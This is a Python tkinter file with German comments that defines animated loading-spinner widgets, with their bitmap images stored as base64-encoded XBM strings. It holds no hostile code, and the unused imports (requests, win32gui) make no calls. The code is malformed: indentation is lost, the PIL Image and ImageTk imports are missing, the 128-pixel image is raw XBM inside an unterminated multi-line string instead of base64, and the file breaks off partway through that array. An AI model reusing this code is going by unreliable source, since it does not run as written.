import tkinter.filedialog as filedialog
import ntpath
import win32gui
import glob
import requests
import re
import threading
import time
import base64
import sys
from tkinter import Canvas
from tkinter.constants import NW
from io import BytesIO
from tkinter import font
#Klassen für die Ladezeichen
class RotatingIcon(Canvas):
_bind_tag_ID = 0
def __init__(self, master, filename=None, data=None, start_animation=True, time=40, **kwargs):
if data is not None:
self._image = Image.open(BytesIO(base64.b64decode(data)))
elif filename is not None:
self._image = Image.open(filename)
elif hasattr(self, "data"):
self._image = Image.open(BytesIO(base64.b64decode(self.data)))
else:
raise Exception("No image data or file")
if self._image.format == "XBM":
self._imagetk_class = ImageTk.BitmapImage
else:
self._imagetk_class = ImageTk.PhotoImage
width, height = self._image.size
self._time = time
kwargs.setdefault("width", width)
kwargs.setdefault("height", height)
kwargs.setdefault("highlightthickness", 0)
if "borderwidth" not in kwargs and "bd" not in kwargs:
kwargs["borderwidth"] = 0
Canvas.__init__(self, master, **kwargs)
self._bind_tag = "icon_rotating%s"%RotatingIcon._bind_tag_ID
RotatingIcon._bind_tag_ID += 1
self.bind_class(self._bind_tag, "<Unmap>", self._on_unmap)
self.bind_class(self._bind_tag, "<Map>", self._on_map)
self._running = False
self._is_mapped = False
if start_animation:
self.start_animation()
def _on_unmap(self, event):
self._is_mapped = False
if self._ID_of_delayed_callback is not None:
self.after_cancel(self._ID_of_delayed_callback)
def _on_map(self, event):
self._is_mapped = True
self._animate()
def start_animation(self):
if self._running: return
new_tags = (self._bind_tag,) + self.bindtags()
self.bindtags(new_tags)
generator = self._animate_generator()
if hasattr(generator, "next"):
# Python2
self._animate = generator.next
else:
# Python3
self._animate = generator.__next__
if self._is_mapped: self._animate()
def stop_animation(self):
if not self._running: return
self._running = False
if self._ID_of_delayed_callback is not None:
self.after_cancel(self._ID_of_delayed_callback)
self._ID_of_delayed_callback = None
new_tags = self.bindtags()[1:]
self.bindtags(new_tags)
def _animate_generator(self):
angle = 0
while True:
tkimage = self._imagetk_class(self._image.rotate(angle))
canvas_obj = self.create_image(0, 0, image=tkimage, anchor=NW)
self._ID_of_delayed_callback = self.after(self._time, self._update_animation)
yield
self.delete(canvas_obj)
angle = (angle + 10) %360
def _update_animation(self):
self._ID_of_delayed_callback = self.after_idle(self._animate)
class MultiSize_RotatingIcon(RotatingIcon):
def __init__(self, master, size, start_animation=True, time=40, **kwargs):
data = self.image_per_size[size]
RotatingIcon.__init__(self, master, data=data, start_animation=start_animation, time=time, **kwargs)
class Spinner1(MultiSize_RotatingIcon):
image_per_size = {
16: 'I2RlZmluZSBpbWFnZV93aWR0aCAxNgojZGVmaW5lIGltYWdlX2hlaWdodCAxNgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4ZTAsMHgwMywweDE4LDB4MGUsMHgwNCwweDE4LDB4MDIsMHgzMCwweDAyLDB4MzAsMHgwMSwweDYwLDB4MDEsMHg2MCwweDAxLAoweDYwLDB4MDEsMHgyMCwweDAxLDB4MjAsMHgwMiwweDEwLDB4MDIsMHgxMCwweDA0LDB4MDgsMHgxOCwweDA0LDB4ZTAsMHgwMywKMHgwMCwweDAwCn07',
22: 'I2RlZmluZSBpbWFnZV93aWR0aCAyMgojZGVmaW5lIGltYWdlX2hlaWdodCAyMgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4ODAsMHgzZiwweDAwLDB4ZTAsMHhmZiwweDAwLDB4NzAsMHhlMCwweDAxLDB4MTgsMHhjMCwweDAzLAoweDA0LDB4MDAsMHgwNywweDA2LDB4MDAsMHgwZSwweDAyLDB4MDAsMHgwZSwweDAxLDB4MDAsMHgxYywweDAxLDB4MDAsMHgxYywKMHgwMSwweDAwLDB4MWMsMHgwMSwweDAwLDB4MWMsMHgwMSwweDAwLDB4MDgsMHgwMSwweDAwLDB4MDQsMHgwMiwweDAwLDB4MDQsCjB4MDIsMHgwMCwweDA0LDB4MDQsMHgwMCwweDAyLDB4MGMsMHgwMCwweDAxLDB4MTgsMHg4MCwweDAwLDB4NjAsMHg2MCwweDAwLAoweDgwLDB4MWYsMHgwMCwweDAwLDB4MDAsMHgwMAp9Ow==',
24: 'I2RlZmluZSBpbWFnZV93aWR0aCAyNAojZGVmaW5lIGltYWdlX2hlaWdodCAyNApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4ODAsMHgzZiwweDAwLDB4ZTAsMHhmZiwweDAwLDB4NzgsMHhlMCwweDAzLDB4MWMsMHg4MCwweDA3LAoweDBlLDB4MDAsMHgwZiwweDA2LDB4MDAsMHgwZSwweDAzLDB4MDAsMHgxYywweDAzLDB4MDAsMHgxYywweDAxLDB4MDAsMHgzOCwKMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MTAsMHgwMSwweDAwLDB4MDgsCjB4MDMsMHgwMCwweDA4LDB4MDMsMHgwMCwweDA4LDB4MDMsMHgwMCwweDA0LDB4MDYsMHgwMCwweDA0LDB4MGMsMHgwMCwweDAyLAoweDE4LDB4MDAsMHgwMSwweDcwLDB4YzAsMHgwMCwweDgwLDB4M2YsMHgwMCwweDAwLDB4MDAsMHgwMAp9Ow==',
32: 'I2RlZmluZSBpbWFnZV93aWR0aCAzMgojZGVmaW5lIGltYWdlX2hlaWdodCAzMgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZjAsMHgwZiwweDAwLDB4MDAsMHhmYywweDdmLAoweDAwLDB4MDAsMHhmZiwweGZmLDB4MDEsMHhjMCwweDBmLDB4ZjgsMHgwMywweGUwLDB4MDMsMHhjMCwweDA3LDB4ZjAsMHgwMCwKMHg4MCwweDBmLDB4NzAsMHgwMCwweDAwLDB4MWYsMHgzOCwweDAwLDB4MDAsMHgzZSwweDFjLDB4MDAsMHgwMCwweDNjLDB4MGMsCjB4MDAsMHgwMCwweDc4LDB4MGMsMHgwMCwweDAwLDB4NzgsMHgwZSwweDAwLDB4MDAsMHhmOCwweDA2LDB4MDAsMHgwMCwweGYwLAoweDA2LDB4MDAsMHgwMCwweGYwLDB4MDYsMHgwMCwweDAwLDB4ZjAsMHgwNiwweDAwLDB4MDAsMHhmMCwweDA2LDB4MDAsMHgwMCwKMHg2MCwweDA2LDB4MDAsMHgwMCwweDIwLDB4MDYsMHgwMCwweDAwLDB4MjAsMHgwYywweDAwLDB4MDAsMHgxMCwweDBjLDB4MDAsCjB4MDAsMHgxMCwweDE4LDB4MDAsMHgwMCwweDA4LDB4MTgsMHgwMCwweDAwLDB4MDgsMHgzMCwweDAwLDB4MDAsMHgwNCwweDYwLAoweDAwLDB4MDAsMHgwMiwweGMwLDB4MDAsMHgwMCwweDAxLDB4ODAsMHgwMywweDgwLDB4MDAsMHgwMCwweDFlLDB4NzAsMHgwMCwKMHgwMCwweGYwLDB4MGYsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwCn07',
48: 'I2RlZmluZSBpbWFnZV93aWR0aCA0OAojZGVmaW5lIGltYWdlX2hlaWdodCA0OApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmOCwweDBmLDB4MDAsMHgwMCwweDAwLDB4ODAsMHhmZiwweGZmLDB4MDAsMHgwMCwKMHgwMCwweGUwLDB4ZmYsMHhmZiwweDAzLDB4MDAsMHgwMCwweGY4LDB4ZmYsMHhmZiwweDBmLDB4MDAsMHgwMCwweGZjLDB4MDcsCjB4ZjgsMHgxZiwweDAwLDB4MDAsMHhmZSwweDAwLDB4YzAsMHg3ZiwweDAwLDB4MDAsMHgzZiwweDAwLDB4MDAsMHhmZiwweDAwLAoweDgwLDB4MGYsMHgwMCwweDAwLDB4ZmUsMHgwMSwweGMwLDB4MDcsMHgwMCwweDAwLDB4ZjgsMHgwMywweGUwLDB4MDMsMHgwMCwKMHgwMCwweGYwLDB4MDMsMHhmMCwweDAxLDB4MDAsMHgwMCwweGUwLDB4MDcsMHhmMCwweDAwLDB4MDAsMHgwMCwweGUwLDB4MGYsCjB4NzgsMHgwMCwweDAwLDB4MDAsMHhjMCwweDBmLDB4NzgsMHgwMCwweDAwLDB4MDAsMHg4MCwweDFmLDB4M2MsMHgwMCwweDAwLAoweDAwLDB4ODAsMHgxZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgzZiwweDFjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgzZiwKMHgxYywweDAwLDB4MDAsMHgwMCwweDAwLDB4M2YsMHgxZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4N2UsMHgwZSwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDdlLDB4MGUsMHgwMCwweDAwLDB4MDAsMHgwMCwweDdlLDB4MGUsMHgwMCwweDAwLDB4MDAsMHgwMCwweDdlLAoweDBlLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3ZSwweDBlLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3ZSwweDBlLDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4N2UsMHgwZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4M2MsMHgwZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDgsCjB4MGMsMHgwMCwweDAwLDB4MDAsMHgwMCwweDA4LDB4MWMsMHgwMCwweDAwLDB4MDAsMHgwMCwweDA0LDB4MWMsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwNCwweDE4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweDM4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMiwKMHgzMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDIsMHg3MCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDEsMHg2MCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAxLDB4ZTAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDAwLDB4YzAsMHgwMSwweDAwLDB4MDAsMHg0MCwweDAwLAoweDgwLDB4MDMsMHgwMCwweDAwLDB4MjAsMHgwMCwweDAwLDB4MDcsMHgwMCwweDAwLDB4MTAsMHgwMCwweDAwLDB4MGUsMHgwMCwKMHgwMCwweDA4LDB4MDAsMHgwMCwweDM4LDB4MDAsMHgwMCwweDA2LDB4MDAsMHgwMCwweGUwLDB4MDAsMHg4MCwweDAxLDB4MDAsCjB4MDAsMHg4MCwweDA3LDB4NzAsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZjLDB4MGYsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMAp9Ow==',
64: 'I2RlZmluZSBpbWFnZV93aWR0aCA2NAojZGVmaW5lIGltYWdlX2hlaWdodCA2NApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4ZjgsMHgzZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweGZmLDB4ZmYsMHgwMywKMHgwMCwweDAwLDB4MDAsMHgwMCwweGYwLDB4ZmYsMHhmZiwweDFmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmYywweGZmLDB4ZmYsCjB4N2YsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZlLDB4ZmYsMHhmZiwweGZmLDB4MDEsMHgwMCwweDAwLDB4ODAsMHhmZiwweGZmLAoweGZmLDB4ZmYsMHgwMywweDAwLDB4MDAsMHhjMCwweGZmLDB4MDcsMHhlMCwweGZmLDB4MGYsMHgwMCwweDAwLDB4ZjAsMHg3ZiwKMHgwMCwweDAwLDB4ZmYsMHgxZiwweDAwLDB4MDAsMHhmOCwweDBmLDB4MDAsMHgwMCwweGZjLDB4M2YsMHgwMCwweDAwLDB4ZmMsCjB4MDcsMHgwMCwweDAwLDB4ZjAsMHg3ZiwweDAwLDB4MDAsMHhmZSwweDAxLDB4MDAsMHgwMCwweGMwLDB4ZmYsMHgwMCwweDAwLAoweGZlLDB4MDAsMHgwMCwweDAwLDB4ODAsMHhmZiwweDAxLDB4MDAsMHgzZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgwMywKMHg4MCwweDFmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmZSwweDAzLDB4ODAsMHgwZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmMsCjB4MDcsMHhjMCwweDBmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmOCwweDBmLDB4ZTAsMHgwNywweDAwLDB4MDAsMHgwMCwweDAwLAoweGYwLDB4MGYsMHhlMCwweDAzLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmMCwweDFmLDB4ZjAsMHgwMywweDAwLDB4MDAsMHgwMCwKMHgwMCwweGUwLDB4MWYsMHhmMCwweDAxLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhlMCwweDNmLDB4ZjAsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweGMwLDB4M2YsMHhmOCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhjMCwweDNmLDB4ZjgsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDgwLDB4N2YsMHg3OCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDdmLDB4NzgsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwMCwweDgwLDB4N2YsMHg3YywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDdmLDB4M2MsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZmLAoweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwKMHhmZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHhmZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHg3ZSwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4M2MsMHgzYywweDAwLDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwOCwweDc4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDgsMHg3OCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweDc4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDQsMHg3OCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweGYwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDQsMHhmMCwKMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMiwweGYwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDIsCjB4ZTAsMHgwMSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMSwweGUwLDB4MDEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAxLDB4YzAsMHgwMywweDAwLDB4MDAsMHgwMCwweDAwLDB4ODAsMHgwMCwweDgwLDB4MDcsMHgwMCwweDAwLDB4MDAsMHgwMCwKMHg4MCwweDAwLDB4ODAsMHgwNywweDAwLDB4MDAsMHgwMCwweDAwLDB4NDAsMHgwMCwweDAwLDB4MGYsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHgyMCwweDAwLDB4MDAsMHgxZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MzAsMHgwMCwweDAwLDB4M2MsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgxOCwweDAwLDB4MDAsMHg3OCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MGMsMHgwMCwweDAwLDB4ZjAsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwNiwweDAwLDB4MDAsMHhlMCwweDAzLDB4MDAsMHgwMCwweDAwLDB4MDMsMHgwMCwweDAwLDB4YzAsCjB4MDcsMHgwMCwweDAwLDB4YzAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDFmLDB4MDAsMHgwMCwweDcwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4ZmMsMHgwMCwweDAwLDB4MWUsMHgwMCwweDAwLDB4MDAsMHgwMCwweGYwLDB4MDcsMHhlMCwweDA3LDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4YzAsMHhmZiwweGZmLDB4MDEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmMsMHgxZiwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAKfTs=',
128: '#define image_width 128
#define image_height 128
static char image_bits[] = {
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,
0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,
0xff,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,
0xff,0xff,0xff,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,
0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0xff,0xff,0xff,0xff,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xe0,0xff,0xff,0xff,0xff,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xf0,0xff,0xff,0xff,0xff,0xff,0xff,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xfc,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0xe0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x1f,0x00,
0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0xff,0xff,0x00,0xc0,0xff,0xff,0xff,0x7f,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,0x07,0x00,0x00,0xf8,0xff,0xff,
0xff,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x7f,0x00,0x00,0x00,0x80,0xff,
0xff,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,
0xfe,0xff,0xff,0x03,0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x03,0x00,0x00,0x00,
0x00,0xf0,0xff,0xff,0x07,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0x00,0x00,0x00,
0x00,0x00,0xc0,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,0xe0,0xff,0x3f,0x00,0x00,
0x00,0x00,0x00,0x80,0xff,0xff,0x3f,0x00,0x00,0x00,0x00,0xf0,0xff,0x0f,0x00,
0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x7f,0x00,0x00,0x00,0x00,0xf8,0xff,0x07,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0x7f,0x00,0x00,0x00,0x00,0xfc,0xff,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0xff,0x00,0x00,0x00,0x00,0xfc,
0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0xff,0xff,0x01,0x00,0x00,0x00,
0xfe,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0x03,0x00,0x00,
0x00,0xff,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x07,0x00,
0x00,0x80,0xff,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x0f,
0x00,0x00,0x80,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,
0x0f,0x00,0x00,0xc0,0xff,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,
0xff,0x1f,0x00,0x00,0xe0,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xf0,0xff,0x3f,0x00,0x00,0xe0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xf0,0xff,0x3f,0x00,0x00,0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xe0,0xff,0x7f,0x00,0x00,0xf0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0xff,0xff,0x00,0x00,0xf8,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x00,0x00,0xf8,0x1f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x01,0x00,0xfc,0x1f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x01,0x00,0xfc,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x03,0x00,0xfe,0x07,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x03,0x00,0xfe,0x07,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0x07,0x00,0xff,
0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0x07,0x00,
0xff,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0x07,
0x00,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,
0x0f,0x80,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,
0xff,0x0f,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xf0,0xff,0x1f,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xe0,0xff,0x1f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xe0,0xff,0x1f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xe0,0xff,0x3f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xe0,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xe0,0x3f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xf0,
0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0xff,
0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,
0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0x7f,0xf0,0x0f,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x3f,0xf0,0x0f,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x3f,0xf0,
0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x0f,
0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,
0x01,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x7f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x7f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,
